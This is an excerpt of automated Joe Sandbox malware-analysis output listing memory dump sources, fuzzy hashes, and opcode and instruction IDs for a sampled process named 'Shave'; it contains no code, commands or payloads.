                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: fad2fd1ff2e7aee67950c64908abb563c83ec9893bf790b6e6d546d1d3e74bdc
                                                                                                                                • Instruction ID: d9d885493b74a6084d2338a49a39d0a3a28ca45e2c3ae498f250f917758563c7
                                                                                                                                • Opcode Fuzzy Hash: fad2fd1ff2e7aee67950c64908abb563c83ec9893bf790b6e6d546d1d3e74bdc
                                                                                                                                • Instruction Fuzzy Hash: 2481A374E00218DFDB18DFAAD984A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: ec559539cba9feb1421b7daae0b50bd164a549aad761ed563e12bace2b4e89ab
                                                                                                                                • Instruction ID: 0e91de1d98b0151ae9d6f102dffe5bc05676dc99f2ae659414dd799edf7204a8
                                                                                                                                • Opcode Fuzzy Hash: ec559539cba9feb1421b7daae0b50bd164a549aad761ed563e12bace2b4e89ab
                                                                                                                                • Instruction Fuzzy Hash: D581D474E00218CFDB18DFAAD984A9DBBF2BF88305F14C069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: 752fa01cf76e920bb34815aa396b10ffa9f066c7f7303389f838572d2263115b
                                                                                                                                • Instruction ID: 2a6de808d66c323796ba8e57f067245f5b732196f6b481eb735285cba47a6cb6
                                                                                                                                • Opcode Fuzzy Hash: 752fa01cf76e920bb34815aa396b10ffa9f066c7f7303389f838572d2263115b
                                                                                                                                • Instruction Fuzzy Hash: B081C574E00618CFDB18DFAAD984A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o]q$4']q$4']q$4']q
                                                                                                                                • API String ID: 0-875651895
                                                                                                                                • Opcode ID: aa11cfffdbbc4ee5990667e3ee2e72fee7fdd143fcffcd2ed5449e172cb89dd8
                                                                                                                                • Instruction ID: ba8fe82d2e3721e3aecff08fbe0d256810c64a1fb7e7de0cd7ad54561b75e15f
                                                                                                                                • Opcode Fuzzy Hash: aa11cfffdbbc4ee5990667e3ee2e72fee7fdd143fcffcd2ed5449e172cb89dd8
                                                                                                                                • Instruction Fuzzy Hash: 5CA28130644209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D734ED89CB52
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o]q$(o]q$,aq$,aq
                                                                                                                                • API String ID: 0-1947289240
                                                                                                                                • Opcode ID: 09e2740637d7c247116a78911a2fa9411ce79cfeb328e201610e4248f8d44ee9
                                                                                                                                • Instruction ID: 1402e258e3bbc8a771ae9564bee119c2f00f5d0033c9e8ea1b31a2ac45ec5bd9
                                                                                                                                • Opcode Fuzzy Hash: 09e2740637d7c247116a78911a2fa9411ce79cfeb328e201610e4248f8d44ee9
                                                                                                                                • Instruction Fuzzy Hash: EA026030A04219DFCB15CF68E885AADBBF2BF49302F558469EC25EB2A1D730DD49CB51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: N
                                                                                                                                • API String ID: 0-1130791706
                                                                                                                                • Opcode ID: 7b7e8a573bef4fde87b26870937966bd48d2e699a38ff7f0f13ab5abf93b845a
                                                                                                                                • Instruction ID: 3c8d23b28fa7972029252d3270b683cf5d0fa8474be38e326b7f586aa11f6e29
                                                                                                                                • Opcode Fuzzy Hash: 7b7e8a573bef4fde87b26870937966bd48d2e699a38ff7f0f13ab5abf93b845a
                                                                                                                                • Instruction Fuzzy Hash: 7173E631C1075A8EDB11EF68C854AADFBB1FF99300F51D69AE44867221EB70AAD4CF41
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5$Te]q
                                                                                                                                • API String ID: 0-1459978942
                                                                                                                                • Opcode ID: 7534f67f1a1bb7ace0e505f8b0a507f4b37ac5411ed5758d2310ba2f6775189e
                                                                                                                                • Instruction ID: eb0056121c13c67f26c0c6d8fee66e5205f7b3aca28a7beeb7aa042bf0bd0fb9
                                                                                                                                • Opcode Fuzzy Hash: 7534f67f1a1bb7ace0e505f8b0a507f4b37ac5411ed5758d2310ba2f6775189e
                                                                                                                                • Instruction Fuzzy Hash: 74C2C274A01229CFDB64DF24C994BADB7B6BF89300F2081E9D90967361DB35AE85CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te]q$Te]q
                                                                                                                                • API String ID: 0-3320153681
                                                                                                                                • Opcode ID: 946067836f66978ee4b5a6d6f3eb41b14f844d77ec87fa81668624422cd4757d
                                                                                                                                • Instruction ID: c537d4af73d179eb55da3a44695488c8d1fc075d3a103db54ef9c3f8cc0be841
                                                                                                                                • Opcode Fuzzy Hash: 946067836f66978ee4b5a6d6f3eb41b14f844d77ec87fa81668624422cd4757d
                                                                                                                                • Instruction Fuzzy Hash: 95C2D274A01228CFDB64DF24C994BADBBB6FB49300F2081E9D909A7361DB359E85CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o]q$Haq
                                                                                                                                • API String ID: 0-903699183
                                                                                                                                • Opcode ID: 42d5f0b62a28932d8fd62fbc84ee49e91fdc76708527da9cd58272ff656c5a69
                                                                                                                                • Instruction ID: f9ab3b14fd359f243cb62ca6a25bce92650501938d0f7d80c13f919600d82e27
                                                                                                                                • Opcode Fuzzy Hash: 42d5f0b62a28932d8fd62fbc84ee49e91fdc76708527da9cd58272ff656c5a69
                                                                                                                                • Instruction Fuzzy Hash: 10128E70B00219CFDB14DF69C854AAEBBF6BF88301F208569E859DB3A5DB309D45CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q$PH]q
                                                                                                                                • API String ID: 0-1166926398
                                                                                                                                • Opcode ID: 8d4479e5ead7254de6013cbd5aea1e356991c0307778009d83e629132bf41733
                                                                                                                                • Instruction ID: 7cad319b66f41462ee5437e999c6bf03f8bac9f713d065de70e75b1a74d3a3b7
                                                                                                                                • Opcode Fuzzy Hash: 8d4479e5ead7254de6013cbd5aea1e356991c0307778009d83e629132bf41733
                                                                                                                                • Instruction Fuzzy Hash: 0B81D074E00218CFDB18DFA9D994A9DBBF2BF89305F20816AD419BB394DB346A45CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: e94d8b20b944c54bd85d3df883dc85350e1a40a7757e45708873aaac63fad345
                                                                                                                                • Instruction ID: de5dac4ba6499cea0d7baf5329653919572d05101edbdf1cda3f0435617ca8d7
                                                                                                                                • Opcode Fuzzy Hash: e94d8b20b944c54bd85d3df883dc85350e1a40a7757e45708873aaac63fad345
                                                                                                                                • Instruction Fuzzy Hash: BBE1B0B4E00218CFDB24DFA9C944B9DBBB2BF89304F2080A9D919B7395DB355A85CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 6c3f7a6df0b627b20856b740f3da395c60e4b150c266e9cd2c785edbdda997d7
                                                                                                                                • Instruction ID: 98ae12da68280a2fd824796ecc288310e7bc6e8b81fbe7d463107bb41a11c732
                                                                                                                                • Opcode Fuzzy Hash: 6c3f7a6df0b627b20856b740f3da395c60e4b150c266e9cd2c785edbdda997d7
                                                                                                                                • Instruction Fuzzy Hash: FFD1B174E00218CFDB54DFA9C994B9DBBB2BF89304F1080A9D908AB355DB359D86CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: c4c9a38d1dc153fd7b8c4f3c7b2d38a9048454e058a001ecfe7d20b6a5a3b30c
                                                                                                                                • Instruction ID: a249a38ee0a932fafd4a8207ce81a7e3a0923dd0dbc32b11a5b0096fb31bfb3a
                                                                                                                                • Opcode Fuzzy Hash: c4c9a38d1dc153fd7b8c4f3c7b2d38a9048454e058a001ecfe7d20b6a5a3b30c
                                                                                                                                • Instruction Fuzzy Hash: 7CD1B078E00218CFDB54DFA9C984B9DBBB2BF89300F1080A9D909AB365DB355D86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 83eff8a69b1018b625c5091655475986e320422bf4cd8934595d2980c9eee90d
                                                                                                                                • Instruction ID: 71d512578b551d7cf946f996365a0c336d793b8a34afcd659228d14f85d0d769
                                                                                                                                • Opcode Fuzzy Hash: 83eff8a69b1018b625c5091655475986e320422bf4cd8934595d2980c9eee90d
                                                                                                                                • Instruction Fuzzy Hash: A0825B74E012298FDB65DF69CD94BDDBBB2BB89300F1481E9984DA7261DB305E85CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d6b8227952e6a3f13509d7f3e0cca056a70470230be5aa2bbb5c2641ff9284cd
                                                                                                                                • Instruction ID: f36645c86007d3fbd21e4ea3426e1a4c00c33fbed35b6cc71daa3b7bdfc67fc5
                                                                                                                                • Opcode Fuzzy Hash: d6b8227952e6a3f13509d7f3e0cca056a70470230be5aa2bbb5c2641ff9284cd
                                                                                                                                • Instruction Fuzzy Hash: 64223F74E01218CFDB18EFA9C884B9DBBB2BF88300F5485A9D809AB355DB359D85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d3292d20ff45fa11a6cb9cdf995b932a060a41bf3041b4ad3dd7f3a0ca86b2ee
                                                                                                                                • Instruction ID: 700aca3df5503220caec86f6efb6c74169d4aa10125227df354584de1f8e31a3
                                                                                                                                • Opcode Fuzzy Hash: d3292d20ff45fa11a6cb9cdf995b932a060a41bf3041b4ad3dd7f3a0ca86b2ee
                                                                                                                                • Instruction Fuzzy Hash: EDE1C174E01218CFDB24DFA5C984B9DBBB2BF89304F2081A9D809BB395DB755A85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b347c85d9b328944b9e0ff9ef865a6844cac7aad153da0df031adabdea29543e
                                                                                                                                • Instruction ID: e05b9c244e7a88de3da6725fd552aeecf3526d01a4a27a5438249897fec7c4e0
                                                                                                                                • Opcode Fuzzy Hash: b347c85d9b328944b9e0ff9ef865a6844cac7aad153da0df031adabdea29543e
                                                                                                                                • Instruction Fuzzy Hash: 7DD19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44a69e4a75973d989e1aaff1a4a13a7c39296789173f5569d8f1eb256ea120ef
                                                                                                                                • Instruction ID: b8ba5820caf71b6672ce42b7c18766b6534afe1d233c249d50d148de97368b1e
                                                                                                                                • Opcode Fuzzy Hash: 44a69e4a75973d989e1aaff1a4a13a7c39296789173f5569d8f1eb256ea120ef
                                                                                                                                • Instruction Fuzzy Hash: 32D1A074E00218CFDB54DFA5C984B9DBBB2BF89300F2081A9D509AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2ceb46945b3eef37f063007d0ab25ce03c7602ae99b8c9f1245470834942dadc
                                                                                                                                • Instruction ID: 295c29c4af68daa6bb0432624c02bbeb0fa85089fc26d39311630af0d2c192f9
                                                                                                                                • Opcode Fuzzy Hash: 2ceb46945b3eef37f063007d0ab25ce03c7602ae99b8c9f1245470834942dadc
                                                                                                                                • Instruction Fuzzy Hash: FEC1B278E05218CFDB54DFA5C944B9DBBB2BF88304F2081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 249c7a25e7cb1ab79775886dda7fb1acf2f6bd3b6511d32cafd3e8f18fac423f
                                                                                                                                • Instruction ID: 471f70c27e88230e2b1a30393d05094738e0ff9edd79cf943f9f45d750eb5c18
                                                                                                                                • Opcode Fuzzy Hash: 249c7a25e7cb1ab79775886dda7fb1acf2f6bd3b6511d32cafd3e8f18fac423f
                                                                                                                                • Instruction Fuzzy Hash: DAC1A274E01218CFDB54DFA5C984B9DBBB2BF89300F1081A9D809AB365DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2ebdef89295b8ccac234bb69b34a64df24537f587b23300b5467e7cea9c96a98
                                                                                                                                • Instruction ID: 6c351b859865c328b4c1f7e9df1f789d70a53076910dde5e2c4de97dffdd7a11
                                                                                                                                • Opcode Fuzzy Hash: 2ebdef89295b8ccac234bb69b34a64df24537f587b23300b5467e7cea9c96a98
                                                                                                                                • Instruction Fuzzy Hash: 67C1A274E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0e27f4d4c061b5474b8cfb6f2118583a33de5065d2a8a774c7fdfc40bcc64b3
                                                                                                                                • Instruction ID: afab67b159c0f9ce0ce67af69f8a90f31989b9a8e04757f7bba73163ab412a39
                                                                                                                                • Opcode Fuzzy Hash: f0e27f4d4c061b5474b8cfb6f2118583a33de5065d2a8a774c7fdfc40bcc64b3
                                                                                                                                • Instruction Fuzzy Hash: C4A1A2B5E012188FEB68CF6AC984B9DFBF2BB88305F14C1A9D408A7250DB755A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ebdf09e4a09d4bbc7546d7064da18b371e159bc131cf63977f22270adf49f9a7
                                                                                                                                • Instruction ID: 5d5e7afa63083e11b2325b1f292710dbe392ef53dce5bbff0473671aed4475be
                                                                                                                                • Opcode Fuzzy Hash: ebdf09e4a09d4bbc7546d7064da18b371e159bc131cf63977f22270adf49f9a7
                                                                                                                                • Instruction Fuzzy Hash: C1A1B0B5E012288FEB64CF6AC944BDDFBF2BB88305F14C1AAD408A7250DB755A85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 076f13be3c9e200b8881691cc00989ef9cf330dbe3ee4fd77b84315b3c83ff34
                                                                                                                                • Instruction ID: 42e8f9b45830bf9fdfd79e4115f671b3debcb55cb521f90a9a3ece8ae37d59a9
                                                                                                                                • Opcode Fuzzy Hash: 076f13be3c9e200b8881691cc00989ef9cf330dbe3ee4fd77b84315b3c83ff34
                                                                                                                                • Instruction Fuzzy Hash: BBA1A1B5E012188FEB68CF6AC944BDDFBF2BB88305F14C1A9D408AB254DB755A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b2bc10849615e110e130daae8181be6df445b8243831ce7b7bbebe274b575797
                                                                                                                                • Instruction ID: 30f0b7986ef5222e2ed65476d8fb53a8f3872b80d1753b997aa03ba3c49a3605
                                                                                                                                • Opcode Fuzzy Hash: b2bc10849615e110e130daae8181be6df445b8243831ce7b7bbebe274b575797
                                                                                                                                • Instruction Fuzzy Hash: 52A1C1B4E012188FEB68CF6AC944BDDFBF2BB89305F10C1A9D408AB250DB345A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7253d0d1bb5c966ac73ba6e7f5f532f772b38df2f76e3b1e4488723516b53def
                                                                                                                                • Instruction ID: 6f063e3a4eac6d2d0592842eb80e550ecce06203aeaaec27f59789790e7aef9d
                                                                                                                                • Opcode Fuzzy Hash: 7253d0d1bb5c966ac73ba6e7f5f532f772b38df2f76e3b1e4488723516b53def
                                                                                                                                • Instruction Fuzzy Hash: 9DA1B2B4E412188FEB68CF6AC944BDDFBF2AF88305F14C1AAD408A7250DB755A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48eba6cbd050229c9d4cf979fdbd7b976ffe5293152abb7cc0132f4dc8fe2fe6
                                                                                                                                • Instruction ID: 63d90ea1b3ae02c2cd1b659f14a064cdba8ede8e03887e54373c34af79134bd7
                                                                                                                                • Opcode Fuzzy Hash: 48eba6cbd050229c9d4cf979fdbd7b976ffe5293152abb7cc0132f4dc8fe2fe6
                                                                                                                                • Instruction Fuzzy Hash: 81A1E274D002088FEB14DFA9C944BDDBBB1FF89314F208269E409AB3A1DB759985CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bfbe088a7c8a6686bd963bad68024dd0b14bfb4cc9f9038a3dfd31d80338ae4b
                                                                                                                                • Instruction ID: c19091b8145ff162b5069aff208694c14717e2add80efc4a70deaf2456320f13
                                                                                                                                • Opcode Fuzzy Hash: bfbe088a7c8a6686bd963bad68024dd0b14bfb4cc9f9038a3dfd31d80338ae4b
                                                                                                                                • Instruction Fuzzy Hash: 50A192B5E05218CFEB68DF6AC944BDDFBF2AB88300F14C1AAD408A7254DB345A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c23aec4563eb1af9dddb1a038018210e6116aabbddf8f2a498b3fea22638490
                                                                                                                                • Instruction ID: 0fab21cc6a1e90f8b1596f3bfc36581ead6feb11bd11a87bfc927b3bc621ec94
                                                                                                                                • Opcode Fuzzy Hash: 9c23aec4563eb1af9dddb1a038018210e6116aabbddf8f2a498b3fea22638490
                                                                                                                                • Instruction Fuzzy Hash: 12A1B1B4E012188FEB68CF6AC944B9DFBF2BF88305F14C1A9D408A7250DB745A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e4b546ec09d97ed3d076366a12c833ca4daaa61e074ec9b1d2b1d8aa8bf868c6
                                                                                                                                • Instruction ID: dc57b3395dcf63144848cea7ce526dfaca9b2bf73ba303d19f9c97fefd5426ca
                                                                                                                                • Opcode Fuzzy Hash: e4b546ec09d97ed3d076366a12c833ca4daaa61e074ec9b1d2b1d8aa8bf868c6
                                                                                                                                • Instruction Fuzzy Hash: 77A1A1B5E01218CFEB68CF6AC944B9DFBF2AB88305F14C1AAD408A7250DB755A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c047c7248d3e64d79223659e32b45bebc2f0c687dbd8dc1802ab1043027f9fd5
                                                                                                                                • Instruction ID: 941cf8ce2866eeae646989e8fe907c189136525bdd94cf24a9047f24782a5f7d
                                                                                                                                • Opcode Fuzzy Hash: c047c7248d3e64d79223659e32b45bebc2f0c687dbd8dc1802ab1043027f9fd5
                                                                                                                                • Instruction Fuzzy Hash: 13A193B5E012198FEB68DF6AC944BDDFBF2BB88300F14D1AAD408A7250DB745A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
